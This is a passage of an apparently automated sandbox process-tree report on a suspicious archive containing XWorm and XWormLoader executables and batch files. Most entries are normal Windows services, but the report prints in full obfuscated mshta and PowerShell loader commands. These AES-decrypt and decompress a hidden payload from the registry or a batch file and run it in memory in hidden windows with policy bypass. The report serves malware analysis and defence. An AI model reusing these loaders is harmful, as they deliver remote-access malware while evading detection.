  "dwm.exe"
  2⤵
  PID:884

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:964

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:344

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:596

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1168
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:1156
- C:\Windows\$sxr-mshta.exe
  "C:\Windows\$sxr-mshta.exe" "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-TwfkFnoyLGWlxhzmArsw4312:GqsDRNfa=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:1312
- - C:\Windows\$sxr-cmd.exe
    "C:\Windows\$sxr-cmd.exe" /c %$sxr-TwfkFnoyLGWlxhzmArsw4312:GqsDRNfa=%
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4956
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2080
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function ASDgm($hbtlH){ $jvCLB=[System.Security.Cryptography.Aes]::Create(); $jvCLB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $jvCLB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $jvCLB.Key=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('blz4wP7NQ0z9G5HU5qt1rBXWDUDwhPjk4R14Im6s+lY='); $jvCLB.IV=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('tyHaD0iUmC1atKVX/rbjZw=='); $bkHaC=$jvCLB.('@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@'.Replace('@', ''))(); $KdWyo=$bkHaC.('@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@'.Replace('@', ''))($hbtlH, 0, $hbtlH.Length); $bkHaC.Dispose(); $jvCLB.Dispose(); $KdWyo;}function cHftl($hbtlH){ $ZLGfO=New-Object System.IO.MemoryStream(,$hbtlH); $pEGfA=New-Object System.IO.MemoryStream; Invoke-Expression '$YNTor @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$ZLGfO,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $YNTor.CopyTo($pEGfA); $YNTor.Dispose(); $ZLGfO.Dispose(); $pEGfA.Dispose(); $pEGfA.ToArray();}function cDPce($hbtlH){ $KdWyo = [System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($hbtlH); $KdWyo = ASDgm($KdWyo); $KdWyo = [System.Text.Encoding]::('@U@T@F@8@'.Replace('@', '')).('@G@e@t@S@t@r@i@n@g@'.Replace('@', ''))($KdWyo); return $KdWyo;}function execute_function($hbtlH,$HyIWf){ $wMvLZ = @( '$gbejj = [System.Reflection.Assembly]::Load([byte[]]$hbtlH);', '$nYAXe = $gbejj.EntryPoint;', '$nYAXe.Invoke($null, $HyIWf);' ); foreach ($XGPPP in $wMvLZ) { Invoke-Expression $XGPPP };}$WwewB = cDPce('6jh9/JwNM6P3zg5yY8XZBg==');$pAwEN = cDPce('ZViCuth6vUsFE5+msWnrZo/mOl8APvimIOP0OBotRXY=');$EiozW = cDPce('e/do7iEa4WyK+N/slo150A==');$xMYjW = cDPce('0AZpRDqOSBwoRnb0ckOSHA==');if (@(get-process -ea silentlycontinue $xMYjW).count -gt 1) {exit};$AmhAI = [Microsoft.Win32.Registry]::('@L@o@c@a@l@M@a@c@h@i@n@e@'.Replace('@', '')).('@O@p@e@n@S@u@b@k@e@y@'.Replace('@', ''))($WwewB).('@G@e@t@V@a@l@u@e@'.Replace('@', ''))($pAwEN);$lPNsi=cHftl (ASDgm ([Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($AmhAI)));execute_function $lPNsi (,[string[]] ($EiozW)); "
      4⤵
      PID:4072
  - - C:\Windows\$sxr-powershell.exe
      C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass
      4⤵
      Executes dropped EXE
      Hide Artifacts: Hidden Window
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2352
    - - C:\Windows\$sxr-cmd.exe
        
        "C:\Windows\$sxr-cmd.exe" /C echo [System.Diagnostics.Process]::GetProcessById(2352).WaitForExit();[System.Threading.Thread]::Sleep(5000); function ASDgm($hbtlH){ $jvCLB=[System.Security.Cryptography.Aes]::Create(); $jvCLB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $jvCLB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $jvCLB.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('blz4wP7NQ0z9G5HU5qt1rBXWDUDwhPjk4R14Im6s+lY='); $jvCLB.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('tyHaD0iUmC1atKVX/rbjZw=='); $bkHaC=$jvCLB.("@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@".Replace("@", ""))(); $KdWyo=$bkHaC.("@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@".Replace("@", ""))($hbtlH, 0, $hbtlH.Length); $bkHaC.Dispose(); $jvCLB.Dispose(); $KdWyo;}function cHftl($hbtlH){ $ZLGfO=New-Object System.IO.MemoryStream(,$hbtlH); $pEGfA=New-Object System.IO.MemoryStream; Invoke-Expression '$YNTor @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$ZLGfO,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $YNTor.CopyTo($pEGfA); $YNTor.Dispose(); $ZLGfO.Dispose(); $pEGfA.Dispose(); $pEGfA.ToArray();}function cDPce($hbtlH){ $KdWyo = [System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($hbtlH); $KdWyo = ASDgm($KdWyo); $KdWyo = [System.Text.Encoding]::("@U@T@F@8@".Replace("@", "")).("@G@e@t@S@t@r@i@n@g@".Replace("@", ""))($KdWyo); return $KdWyo;}function execute_function($hbtlH,$HyIWf){ $wMvLZ = @( '$gbejj = [System.Reflection.Assembly]::Load([byte[]]$hbtlH);', '$nYAXe = $gbejj.EntryPoint;', '$nYAXe.Invoke($null, $HyIWf);' ); foreach ($XGPPP in $wMvLZ) { Invoke-Expression $XGPPP };}$WwewB = cDPce('6jh9/JwNM6P3zg5yY8XZBg==');$pAwEN = cDPce('ZViCuth6vUsFE5+msWnrZo/mOl8APvimIOP0OBotRXY=');$EiozW = cDPce('e/do7iEa4WyK+N/slo150A==');$xMYjW = cDPce('0AZpRDqOSBwoRnb0ckOSHA==');if (@(get-process -ea silentlycontinue $xMYjW).count -gt 1) {exit};$AmhAI = [Microsoft.Win32.Registry]::("@L@o@c@a@l@M@a@c@h@i@n@e@".Replace("@", "")).("@O@p@e@n@S@u@b@k@e@y@".Replace("@", ""))($WwewB).("@G@e@t@V@a@l@u@e@".Replace("@", ""))($pAwEN);$lPNsi=cHftl (ASDgm ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($AmhAI)));execute_function $lPNsi (,[string[]] ($EiozW)); | C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass > nul
        5⤵
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        
        PID:4592
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo [System.Diagnostics.Process]::GetProcessById(2352).WaitForExit();[System.Threading.Thread]::Sleep(5000); function ASDgm($hbtlH){ $jvCLB=[System.Security.Cryptography.Aes]::Create(); $jvCLB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $jvCLB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $jvCLB.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('blz4wP7NQ0z9G5HU5qt1rBXWDUDwhPjk4R14Im6s+lY='); $jvCLB.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('tyHaD0iUmC1atKVX/rbjZw=='); $bkHaC=$jvCLB.("@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@".Replace("@", ""))(); $KdWyo=$bkHaC.("@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@".Replace("@", ""))($hbtlH, 0, $hbtlH.Length); $bkHaC.Dispose(); $jvCLB.Dispose(); $KdWyo;}function cHftl($hbtlH){ $ZLGfO=New-Object System.IO.MemoryStream(,$hbtlH); $pEGfA=New-Object System.IO.MemoryStream; Invoke-Expression '$YNTor @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$ZLGfO,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $YNTor.CopyTo($pEGfA); $YNTor.Dispose(); $ZLGfO.Dispose(); $pEGfA.Dispose(); $pEGfA.ToArray();}function cDPce($hbtlH){ $KdWyo = [System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($hbtlH); $KdWyo = ASDgm($KdWyo); $KdWyo = [System.Text.Encoding]::("@U@T@F@8@".Replace("@", "")).("@G@e@t@S@t@r@i@n@g@".Replace("@", ""))($KdWyo); return $KdWyo;}function execute_function($hbtlH,$HyIWf){ $wMvLZ = @( '$gbejj = [System.Reflection.Assembly]::Load([byte[]]$hbtlH);', '$nYAXe = $gbejj.EntryPoint;', '$nYAXe.Invoke($null, $HyIWf);' ); foreach ($XGPPP in $wMvLZ) { Invoke-Expression $XGPPP };}$WwewB = cDPce('6jh9/JwNM6P3zg5yY8XZBg==');$pAwEN = cDPce('ZViCuth6vUsFE5+msWnrZo/mOl8APvimIOP0OBotRXY=');$EiozW = cDPce('e/do7iEa4WyK+N/slo150A==');$xMYjW = cDPce('0AZpRDqOSBwoRnb0ckOSHA==');if (@(get-process -ea silentlycontinue $xMYjW).count -gt 1) {exit};$AmhAI = [Microsoft.Win32.Registry]::("@L@o@c@a@l@M@a@c@h@i@n@e@".Replace("@", "")).("@O@p@e@n@S@u@b@k@e@y@".Replace("@", ""))($WwewB).("@G@e@t@V@a@l@u@e@".Replace("@", ""))($pAwEN);$lPNsi=cHftl (ASDgm ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($AmhAI)));execute_function $lPNsi (,[string[]] ($EiozW)); "
        6⤵
        
        PID:1484
      - C:\Windows\$sxr-powershell.exe
        
        C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass
        6⤵
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4488

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1300

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1320

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1508

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1520
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:3004

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1532

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1616

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1660

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1772

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1804

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1964

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1972

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1984

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1132

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1712

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:2288

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2296

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2376

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2508

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2676

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2804

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2812

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2852

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2872

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2464

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3480

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3572
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Obekräftade 432398.zip"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:32
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zO020686D7\Fixer.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4984
  - - C:\Windows\system32\lodctr.exe
      lodctr /r
      4⤵
      Drops file in System32 directory
      PID:1680
- - C:\Users\Admin\AppData\Local\Temp\7zO020F4C18\XWorm V5.0.exe
    "C:\Users\Admin\AppData\Local\Temp\7zO020F4C18\XWorm V5.0.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:444
- - C:\Users\Admin\AppData\Local\Temp\7zO02008318\XWormLoader.exe
    "C:\Users\Admin\AppData\Local\Temp\7zO02008318\XWormLoader.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2132
  - - C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe
      "C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2480
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 892
        5⤵
        Program crash
        
        PID:4548
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\svchost.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4696
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function ZSHdk($KarSC){ $ZfCFn=[System.Security.Cryptography.Aes]::Create(); $ZfCFn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $ZfCFn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $ZfCFn.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('KtZKjEms98+Uz3JdAwXifcpceQe4mGFCZZetPfWLjV8='); $ZfCFn.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('XxhTpYt8KLdLDSpO7hDOxw=='); $tlguC=$ZfCFn.CreateDecryptor(); $return_var=$tlguC.TransformFinalBlock($KarSC, 0, $KarSC.Length); $tlguC.Dispose(); $ZfCFn.Dispose(); $return_var;}function CaoMW($KarSC){ $tLaFs=New-Object System.IO.MemoryStream(,$KarSC); $lDGtw=New-Object System.IO.MemoryStream; Invoke-Expression '$ixeoS #=# #N#e#w#-#O#b#j#e#c#t# #S#y#s#t#e#m#.#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#G#Z#i#p#S#t#r#e#a#m#(#$tLaFs,# #[#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#C#o#m#p#r#e#s#s#i#o#n#M#o#d#e#]#:#:#D#e#c#o#m#p#r#e#s#s#)#;#'.Replace('#', ''); $ixeoS.CopyTo($lDGtw); $ixeoS.Dispose(); $tLaFs.Dispose(); $lDGtw.Dispose(); $lDGtw.ToArray();}function akbWW($KarSC,$vyQOD){ $xXjIa = @( '$qtafy = [System.Reflection.Assembly]::("@L@o@a@d@".Replace("@", ""))([byte[]]$KarSC);', '$FBuAc = $qtafy.EntryPoint;', '$FBuAc.Invoke($null, $vyQOD);' ); foreach ($eBUTc in $xXjIa) { Invoke-Expression $eBUTc };}$QCWfW=[System.IO.File]::("@R@e@a@d@A@l@l@T@e@x@t@".Replace("@", ""))('C:\Users\Admin\AppData\Local\Temp\svchost.bat').Split([Environment]::NewLine);foreach ($hgEiC in $QCWfW) { if ($hgEiC.StartsWith('SEROXEN')) { $GFlqW=$hgEiC.Substring(7); break; }}$llOQb=CaoMW (ZSHdk ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($GFlqW)));akbWW $llOQb (,[string[]] ('C:\Users\Admin\AppData\Local\Temp\svchost.bat')); "
        5⤵
        
        PID:2304
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
        5⤵
        Command and Scripting Interpreter: PowerShell
        Impair Defenses: Safe Mode Boot
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3312
- - C:\Users\Admin\AppData\Local\Temp\7zO02071728\XWormLoader.exe
    "C:\Users\Admin\AppData\Local\Temp\7zO02071728\XWormLoader.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1688
  - - C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe
      "C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2604
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 896
        5⤵
        Program crash
        
        PID:2008
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\svchost.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5000
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1756
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function ZSHdk($KarSC){ $ZfCFn=[System.Security.Cryptography.Aes]::Create(); $ZfCFn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $ZfCFn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $ZfCFn.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('KtZKjEms98+Uz3JdAwXifcpceQe4mGFCZZetPfWLjV8='); $ZfCFn.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('XxhTpYt8KLdLDSpO7hDOxw=='); $tlguC=$ZfCFn.CreateDecryptor(); $return_var=$tlguC.TransformFinalBlock($KarSC, 0, $KarSC.Length); $tlguC.Dispose(); $ZfCFn.Dispose(); $return_var;}function CaoMW($KarSC){ $tLaFs=New-Object System.IO.MemoryStream(,$KarSC); $lDGtw=New-Object System.IO.MemoryStream; Invoke-Expression '$ixeoS #=# #N#e#w#-#O#b#j#e#c#t# #S#y#s#t#e#m#.#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#G#Z#i#p#S#t#r#e#a#m#(#$tLaFs,# #[#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#C#o#m#p#r#e#s#s#i#o#n#M#o#d#e#]#:#:#D#e#c#o#m#p#r#e#s#s#)#;#'.Replace('#', ''); $ixeoS.CopyTo($lDGtw); $ixeoS.Dispose(); $tLaFs.Dispose(); $lDGtw.Dispose(); $lDGtw.ToArray();}function akbWW($KarSC,$vyQOD){ $xXjIa = @( '$qtafy = [System.Reflection.Assembly]::("@L@o@a@d@".Replace("@", ""))([byte[]]$KarSC);', '$FBuAc = $qtafy.EntryPoint;', '$FBuAc.Invoke($null, $vyQOD);' ); foreach ($eBUTc in $xXjIa) { Invoke-Expression $eBUTc };}$QCWfW=[System.IO.File]::("@R@e@a@d@A@l@l@T@e@x@t@".Replace("@", ""))('C:\Users\Admin\AppData\Local\Temp\svchost.bat').Split([Environment]::NewLine);foreach ($hgEiC in $QCWfW) { if ($hgEiC.StartsWith('SEROXEN')) { $GFlqW=$hgEiC.Substring(7); break; }}$llOQb=CaoMW (ZSHdk ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($GFlqW)));akbWW $llOQb (,[string[]] ('C:\Users\Admin\AppData\Local\Temp\svchost.bat')); "
        5⤵
        
        PID:3160
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
        5⤵
        Command and Scripting Interpreter: PowerShell
        Impair Defenses: Safe Mode Boot
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2368
- - C:\Users\Admin\AppData\Local\Temp\7zO02079868\XWorm V5.0.exe
    "C:\Users\Admin\AppData\Local\Temp\7zO02079868\XWorm V5.0.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:1116
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\Fixer.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3696
- - C:\Windows\system32\lodctr.exe
    lodctr /r
    3⤵
    - Drops file in System32 directory
    PID:1940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3704

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3976

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4104

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4312

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:5020

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4916

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:972

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1640

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2920

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:2952

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3180

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
PID:1788

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4712

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:4904

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:556

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:4752

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
